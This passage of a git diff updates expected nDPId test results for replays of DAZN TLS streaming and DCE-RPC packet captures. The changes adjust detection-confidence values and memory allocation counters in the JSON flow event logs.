+00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1653830641480,"flow_last_seen":1653830641501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":172,"midstream":0,"thread_ts_msec":1653830641501,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"subscriptions-service.dazn-api.com","ja3":"579ccef312d18482fc42e2b822ca2430","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830640613,"flow_last_seen":1653830640651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.27","src_port":46036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} +00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830614885,"flow_last_seen":1653830614920,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"52.84.223.58","src_port":54020,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1653830641480,"flow_last_seen":1653830641520,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1945,"flow_avg_l4_payload_len":486,"midstream":0,"thread_ts_msec":1653830641520,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"13.226.244.30","src_port":40882,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Dazn","breed":"Fun","category":"Streaming"}} 00555{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":12,"source":"dazn.pcapng","alias":"nDPId-test","packets-captured":12,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":5835,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":3,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":24,"global_ts_msec":1653830641520} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 12/12 @@ -30,9 +30,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878139 bytes -~~ total memory freed........: 5878139 bytes -~~ total allocations/frees...: 118143/118143 +~~ total memory allocated....: 6011773 bytes +~~ total memory freed........: 6011773 bytes +~~ total allocations/frees...: 120905/120905 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1167 chars diff --git a/test/results/dcerpc.pcap.out b/test/results/dcerpc.pcap.out index 02fd292a0..238f24178 100644 --- a/test/results/dcerpc.pcap.out +++ b/test/results/dcerpc.pcap.out @@ -2,26 +2,26 @@ 00546{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1602860709979} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":200000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"thread_ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1602860709979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":684,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":684,"pkt_l4_len":650,"thread_ts_msec":1602860709979,"pkt":"AA7wSJ4FABwGCybtCABFAAKeAX4AAB4RFWLAqAELwKgBFMADiJQCip8cBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAAAAP\/\/\/\/8CMgAAAAAAAAMtAAACHgAAAy0AAAAAAAACHgEBAEQBAAABCfGlMMdfbUe2f4BzQ53qrQACABwGCybt3qAAAGyXEdGCcQBkAQ0AKgAAABECWIiSAA5wbGN4YmtvbnRyNzRiNwECAGgBAAABAAGIkgAAAAIAKIAAACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAcAAAABAAAAAIAAAAEAAIABAAIAAIACAAMAAQABAAQAAgABAAYAAwABAAkAAgACAAEACAAEAAEACwECAGgBAAACAAKIkgAAAAIAKIAQACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAIAAgABAAYABAABAAkABwAAAAEAAAAAgAAAAQAAgAEAAgAAgAIAAwABAAEABAACAAEABQADAAEACAEEAEoBAAABAAAAAAAAAAAEBgAAAAQAAQAAAAEAAAABAAABAYAAAAAAAgAAAAEAAAEBgAEAAAADAAAAAQAAAQGAAgAAAAMAAAABAAABAQEEACABAAABAAAAAAABAQAA2AAAAAEAAQAAAAEAAQABAAEBAQEEACYBAAABAAAAAAACCAgABAAAAAEAAQAAAAEAAwABAAEBAQACAAEBAQEEACABAAABAAAAAAADCAAAAgAAAAEAAQAAAAEAAQABAAEBAQEEACABAAABAAAAAAAEAAgAUgAAAAEAAQAAAAEAAgACAAEBAQEDABYBAAABiJIAAAAAAAEAAwAAAQDAAKAA"} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":200000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"thread_ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709979,"flow_last_seen":1602860709979,"flow_idle_time":200000,"flow_min_l4_payload_len":642,"flow_max_l4_payload_len":642,"flow_tot_l4_payload_len":642,"flow_avg_l4_payload_len":642,"midstream":0,"thread_ts_msec":1602860709979,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49155,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 01303{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1602860709979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":684,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":684,"pkt_l4_len":650,"thread_ts_msec":1602860709979,"pkt":"AA7wSJ4FABwGCybtCABFAAKeAX4AAB4RFWLAqAELwKgBFMADiJQCip8cBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAAAAP\/\/\/\/8CMgAAAAAAAAMtAAACHgAAAy0AAAAAAAACHgEBAEQBAAABCfGlMMdfbUe2f4BzQ53qrQACABwGCybt3qAAAGyXEdGCcQBkAQ0AKgAAABECWIiSAA5wbGN4YmtvbnRyNzRiNwECAGgBAAABAAGIkgAAAAIAKIAAACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAcAAAABAAAAAIAAAAEAAIABAAIAAIACAAMAAQABAAQAAgABAAYAAwABAAkAAgACAAEACAAEAAEACwECAGgBAAACAAKIkgAAAAIAKIAQACAAAgABAAD\/\/\/\/\/AAMAA8AAAAAAAAAAAAEAAAAAAAIAAgABAAYABAABAAkABwAAAAEAAAAAgAAAAQAAgAEAAgAAgAIAAwABAAEABAACAAEABQADAAEACAEEAEoBAAABAAAAAAAAAAAEBgAAAAQAAQAAAAEAAAABAAABAYAAAAAAAgAAAAEAAAEBgAEAAAADAAAAAQAAAQGAAgAAAAMAAAABAAABAQEEACABAAABAAAAAAABAQAA2AAAAAEAAQAAAAEAAQABAAEBAQEEACYBAAABAAAAAAACCAgABAAAAAEAAQAAAAEAAwABAAEBAQACAAEBAQEEACABAAABAAAAAAADCAAAAgAAAAEAAQAAAAEAAQABAAEBAQEEACABAAABAAAAAAAEAAgAUgAAAAEAAQAAAAEAAgACAAEBAQEDABYBAAABiJIAAAAAAAEAAwAAAQDAAKAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":200000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1602860709993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1602860709993,"pkt":"ABwGCybtAA7wSJ4FCABFAADGAAUAAB4RGLPAqAEUwKgBC8AJwAMAsvR9BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAAAAAAAAP\/\/\/\/9aAAAAAAAAAAAARgAAAC0DAAAAAAAARgAAAIEBAB4BAAABCfGlMMdfbUe2f4BzQ53qrQACAA7wSJ4FiJKBAgAIAQAAAQABgACBAgAIAQAAAgACgBCBAwAIAQAAAQAUBZg="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":200000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860709993,"flow_last_seen":1602860709993,"flow_idle_time":200000,"flow_min_l4_payload_len":170,"flow_max_l4_payload_len":170,"flow_tot_l4_payload_len":170,"flow_avg_l4_payload_len":170,"midstream":0,"thread_ts_msec":1602860709993,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49161,"dst_port":49155,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1602860709993,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1602860709993,"pkt":"ABwGCybtAA7wSJ4FCABFAADGAAUAAB4RGLPAqAEUwKgBC8AJwAMAsvR9BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAAAAAAAAP\/\/\/\/9aAAAAAAAAAAAARgAAAC0DAAAAAAAARgAAAIEBAB4BAAABCfGlMMdfbUe2f4BzQ53qrQACAA7wSJ4FiJKBAgAIAQAAAQABgACBAgAIAQAAAgACgBCBAwAIAQAAAQAUBZg="} 01727{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1602860710012,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":995,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":995,"pkt_l4_len":961,"thread_ts_msec":1602860710012,"pkt":"AA7wSJ4FABwGCybtCABFAAPVAX8AAB4RFCrAqAELwKgBFMADiJQDwWYXBAAgAAAAAADeoAAAbJcR0YJxAAEBAQFN3qAAAWyXEdGCcQCgJELffTX9qQA1ihISgAQAHAYLJu0AAAAAAAAAAQAAAAEAA\/\/\/\/\/8DaQAAAAAAAANVAAADVQAAA1UAAAAAAAADVQAIADwBAAAACfGlMMdfbUe2f4BzQ53qrf\/\/\/\/\/\/\/\/\/\/AADgQAAAAxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAA8AQAAAQnxpTDHX21Htn+Ac0Od6q0AAAAAAAAAAQAAAAEAAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIQAfADEAAAAACAA8AQAAAgnxpTDHX21Htn+Ac0Od6q0AAAAAAACAAAAAgFEAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAhMAGAEAAADD1of+eJ4Doazb5b\/LvCe2AAAAAAAIADwBAAADCfGlMMdfbUe2f4BzQ53qrQAAAAAAAIAAAACAUgAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACEQAkAQAAAMPWh\/54ngOhrNvlv8u8J7YAAAAAC21ycGRvbWFpbi0xAAgAPAEAAAQJ8aUwx19tR7Z\/gHNDneqtAAAAAAACAAEAAAABAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEABwdRAAAAAAAAAAAIADwBAAAFCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAgAAAAUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBgEA\/wAAAAAIADwBAAAGCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAwAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAQEBAQEBAQEAAAAACAA8AQAABwnxpTDHX21Htn+Ac0Od6q0AAAAAAAMAAQAAAAEAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAHAVEAAAAAAAAAAAgAPAEAAAgJ8aUwx19tR7Z\/gHNDneqtAAAAAAADAAEAAAACAAAABQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEGAQD\/AAAAAAgAPAEAAAkJ8aUwx19tR7Z\/gHNDneqtAAAAAAAEAAEAAAABAAAACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEABgQAAAAAAP8AAAAIADwBAAAKCfGlMMdfbUe2f4BzQ53qrQAAAAAABAABAAAAAgAAAAkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASAQEBAQEBAQE="} 01524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1602860710024,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":846,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":846,"pkt_l4_len":812,"thread_ts_msec":1602860710024,"pkt":"ABwGCybtAA7wSJ4FCABFAANAAAYAAB4RFjjAqAEUwKgBC8AJwAMDLC54BAIKABAAAAAAAKDel2zREYJxAAEBAQFNAQCg3pds0RGCcQCgJELffQCp\/TWKNRISgAQAHAYLJu0AAAAAAQAAAAEAAAADAP\/\/\/\/\/UAgAAAAAAAAAAwAIAAFUDAAAAAAAAwAIAAIAIADwBAAAACfGlMMdfbUe2f4BzQ53qrf\/\/\/\/\/\/\/\/\/\/AADgQAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAAAQnxpTDHX21Htn+Ac0Od6q0AAAAAAAAAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAIJ8aUwx19tR7Z\/gHNDneqtAAAAAAAAgAAAAIBRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAADCfGlMMdfbUe2f4BzQ53qrQAAAAAAAIAAAACAUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAABAnxpTDHX21Htn+Ac0Od6q0AAAAAAAIAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAUJ8aUwx19tR7Z\/gHNDneqtAAAAAAACAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAAGCfGlMMdfbUe2f4BzQ53qrQAAAAAAAgABAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAABwnxpTDHX21Htn+Ac0Od6q0AAAAAAAMAAQAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAgAPAEAAAgJ8aUwx19tR7Z\/gHNDneqtAAAAAAADAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAIADwBAAAJCfGlMMdfbUe2f4BzQ53qrQAAAAAABAABAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACACAA8AQAACgnxpTDHX21Htn+Ac0Od6q0AAAAAAAQAAQAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1602860710063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710063,"pkt":"ABwGCybtAA7wSJ4FCABFAACgAAgAAB4RGNbAqAEUwKgBC8AKiJQAjEB6BAAgABAAAAAAAKDel2zREYJxAGQBDQAqAgCg3pds0RGCcQCgJELffYDI+0MAABAQgAAADvBIngUAAAAAAQAAAAAAAAAEAP\/\/\/\/80AAAAAACgAAAAIAAAAKAAAAAAAAAAIAAAAAESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAAAgAA"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710063,"flow_last_seen":1602860710063,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710063,"l3_proto":"ip4","src_ip":"192.168.1.20","dst_ip":"192.168.1.11","src_port":49162,"dst_port":34964,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1602860710063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710063,"pkt":"ABwGCybtAA7wSJ4FCABFAACgAAgAAB4RGNbAqAEUwKgBC8AKiJQAjEB6BAAgABAAAAAAAKDel2zREYJxAGQBDQAqAgCg3pds0RGCcQCgJELffYDI+0MAABAQgAAADvBIngUAAAAAAQAAAAAAAAAEAP\/\/\/\/80AAAAAACgAAAAIAAAAKAAAAAAAAAAIAAAAAESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAAAgAA"} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1602860710071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710071,"pkt":"AA7wSJ4FABwGCybtCABFAACgAYEAAB4RF13AqAELwKgBFMACwAoAjHUlBAIKAAAAAADeoAAAbJcR0YJxAGQBDQAq3qAAAmyXEdGCcQCgJELffUP7yIAAABAQgAAADvBIngUAJ7vVAAAAAQAAAAAABP\/\/\/\/8ANAAAAAAAAAAAAAAAIAAAAKAAAAAAAAAAIIESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAACAAA"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1602860710071,"flow_last_seen":1602860710071,"flow_idle_time":200000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1602860710071,"l3_proto":"ip4","src_ip":"192.168.1.11","dst_ip":"192.168.1.20","src_port":49154,"dst_port":49162,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RPC","breed":"Acceptable","category":"RPC"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dcerpc.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1602860710071,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":174,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":174,"pkt_l4_len":140,"thread_ts_msec":1602860710071,"pkt":"AA7wSJ4FABwGCybtCABFAACgAYEAAB4RF13AqAELwKgBFMACwAoAjHUlBAIKAAAAAADeoAAAbJcR0YJxAGQBDQAq3qAAAmyXEdGCcQCgJELffUP7yIAAABAQgAAADvBIngUAJ7vVAAAAAQAAAAAABP\/\/\/\/8ANAAAAAAAAAAAAAAAIAAAAKAAAAAAAAAAIIESABwBAAAACfGlMMdfbUe2f4BzQ53qrQACAAAACAAA"} 